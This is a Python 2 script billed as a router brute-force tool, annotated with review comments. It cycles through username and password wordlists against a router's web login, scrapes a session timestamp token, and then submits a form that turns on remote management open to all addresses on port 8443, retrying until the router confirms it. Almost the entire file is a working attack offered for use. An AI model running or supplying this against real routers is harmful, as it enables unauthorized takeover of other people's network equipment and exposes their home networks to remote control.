import requests
import re
import time
import argparse
# --- Script setup: CLI argument, wordlists, and request constants ---
# Everything in this file runs at import time; it is written to be executed
# directly (Python 2 print statements).
parser = argparse.ArgumentParser(description='PORTAL - Router Bruteforce Tool')
parser.add_argument('ip', type=str, help='ip address of target router')
args = parser.parse_args()
target_ip = args.ip
user_names = []
passwords = []
# Wordlists are read from the current working directory; a missing file
# raises here (IOError under Python 2). Neither handle is closed explicitly --
# 'f' is simply rebound from the first file to the second.
f = open('users.txt','r')
data = f.readlines()
user_names = [user.strip() for user in data]
f = open('passwords.txt','r')
data = f.readlines()
passwords = [password.strip() for password in data]
# Both wordlists are echoed in full to stdout.
print 'Loaded users: {}'.format(user_names)
print 'Loaded passwords: {}'.format(passwords)
# Maximum number of times to try enable remote management
max_attempts = 10
# Router page requested during the credential check and again by verify_rm().
target_page = 'FW_remote.htm'
# Port value submitted as the 'http_rmport' form field by enable_rm().
rmport = 8443
# Headers
# These are sent only by the POST in enable_rm(); the two requests.get() calls
# in this file pass no headers and use the requests defaults.
pragma = 'no-cache'
accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
acceptlang = 'en-us'
acceptenc = 'gzip, deflate'
contenttype = 'application/x-www-form-urlencoded'
# NOTE(review): Origin is fixed to 192.168.1.1 while Referer below is built
# from target_ip, so the two disagree for any other target_ip -- presumably
# unintentional; confirm.
origin = 'http://192.168.1.1'
ua = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15'
uir = '1'
ref = 'http://{}/{}'.format(target_ip, target_page)
headers = {
    'Pragma': pragma,
    'Accept': accept,
    'Accept-Language': acceptlang,
    'Cache-Control': "no-cache",
    'Accept-Encoding': acceptenc,
    'Content-Type': contenttype,
    'Origin': origin,
    'User-Agent': ua,
    'Upgrade-Insecure-Requests': uir,
    'Referer': ref,
}
# Get timestamp token and verify credentials
# NOTE(review): indentation was lost in the rendered page; the nesting below is
# reconstructed from the control flow (break/sleep placement) -- confirm against
# the original file.
# Every (user, password) pair is one HTTP GET of target_page with the
# credentials embedded in the URL as 'http://user:pass@host/...'.
timestamp = None
verified_user = None
verified_pass = None
for user in user_names:
    for password in passwords:
        url = 'http://{}:{}@{}/{}'.format(user, password, target_ip, target_page)
        # The full URL -- credentials included -- is printed on every attempt.
        print '[-] Trying: {}'.format(url)
        r = requests.get(url)
        # "Accepted" means HTTP 200 whose body does not contain the literal
        # text '401 Authorization'; this relies on the router embedding that
        # string in its failure page rather than on the status code alone.
        if r.status_code == 200 and '401 Authorization' not in r.text:
            print '[+] Found correct user and password: {}:{}'.format(user, password)
            verified_user = user
            verified_pass = password
            # print '[-] Searching for timestamp in: {}'.format(r.text)
            # Greedy '(.*)' runs to the last '"' on the matching line; if that
            # span is not purely digits, int() raises ValueError here.
            m = re.search('timestamp=(.*)\"', r.text)
            if m:
                timestamp = int(m.group(1))
                print '[+] Found timestamp: {}'.format(timestamp)
            # Stop trying further passwords for this user.
            break
        # Fixed 0.2 s pause between attempts (not reached after an accepted pair).
        time.sleep(0.2)
    # An accepted empty username or password is falsy, so it would not stop the
    # outer loop here nor count as "found" in the check below.
    if verified_user and verified_pass:
        break
# Both checks end the script via exit(). The second fires when credentials
# were accepted but no timestamp was parsed from the page (or it parsed as 0).
if not verified_user and not verified_pass:
    print '[!] Could not find router credentials.'
    exit()
if not timestamp:
    print '[!] Could not find timestamp token value.'
    exit()
def enable_rm():
    """Submit the remote-management form to the router and return the Response.

    Reads module globals: timestamp (appended to the apply.cgi query string),
    verified_user / verified_pass / target_ip (Basic Auth embedded in the URL),
    rmport (sent as 'http_rmport') and headers. The response status is not
    inspected here; callers check it.
    """
    page = 'apply.cgi?/FW_remote.htm%20timestamp={}'.format(timestamp)
    url = 'http://{}:{}@{}/{}'.format(verified_user, verified_pass, target_ip, page)
    # Form fields as submitted; their meaning is router-specific and not
    # documented in this file.
    data = {
        'submit_flag': 'remote',
        'http_rmenable': '1',
        # NOTE(review): literal three-dot string -- looks like an unfilled
        # placeholder rather than a real value; confirm.
        'local_ip': '...',
        'remote_mg_enable': '0',
        'rm_access': 'all',
        'http_rmport': str(rmport)
    }
    print '[-] Attempting to enable remote management'
    # Echoes the form body only; the URL (and thus the credentials) is not
    # printed from this function.
    print '[-] Request data: {}'.format(data)
    return requests.post(url, headers=headers, data=data)
# First submission. A 200 here only means the POST was accepted; whether the
# setting actually changed is checked by verify_rm() further down.
r = enable_rm()
if r.status_code == 200:
    print '[+] Successfully submitted request'
def verify_rm():
    """Fetch FW_remote.htm with the verified credentials and report its state.

    Parses three JavaScript variables out of the page body. Returns True when
    remote_access is '2', False when it is '0' or (see note on the else below)
    unrecognised. On a non-200 response nothing is returned (implicit None).

    Reads module globals verified_user, verified_pass and target_ip. Note that
    the three .group(1) calls assume every pattern matched; if any of them
    returns None on a 200 page this raises AttributeError.
    """
    page = 'FW_remote.htm'
    url = 'http://{}:{}@{}/{}'.format(verified_user, verified_pass, target_ip, page)
    print '[-] Verifying remote management is enabled'
    # No custom headers on this GET (unlike the POST in enable_rm()).
    r = requests.get(url)
    if r.status_code == 200:
        # Greedy '(.*)' in each pattern captures up to the last closing quote
        # on the matching line.
        m = re.search('var remote_access=\'(.*)\';', r.text)
        pt = re.search('var remote_port=\"(.*)\";', r.text)
        ip = re.search('var remote_manage_ip=\"(.*)\";', r.text)
        remote_management = m.group(1)
        remote_port = pt.group(1)
        remote_ip = ip.group(1)
        # print '[+] Found remote_management variable: {}'.format(remote_management)
        if remote_management == '2':
            print '[+] Remote management: Enabled'
            print '[+] Remote IP: {}'.format(remote_ip)
            print '[+] Remote port: {}'.format(remote_port)
            return True
        if remote_management == '0':
            print '[+] Remote management: Disabled'
            return False
        # NOTE(review): indentation was lost in the rendered page; this else is
        # attached to the '== 0' check here, but it could equally belong to the
        # status_code check (non-200 -> 'Unknown'). Either way the caller's
        # 'while not verify_rm()' sees a falsy result. Confirm against the file.
        else:
            print '[+] Remote management: Unknown'
            return False
# Retry loop. verify_rm() runs at the top of every iteration, so the first
# enable_rm() call above is re-checked before any retry is sent; at most
# max_attempts further POSTs are made. The "Successfully enabled" message
# below is printed on a 200 from the POST alone -- only the next verify_rm()
# call actually confirms the state.
attempts = max_attempts
while not verify_rm():
    attempts = attempts - 1
    r = enable_rm()
    if r.status_code == 200:
        print '[+] Successfully enabled remote management at port: {}'.format(rmport)
    else:
        print '[+] Remote management not enabled. (attempts remaining: {})'.format(attempts)
    if attempts == 0:
        break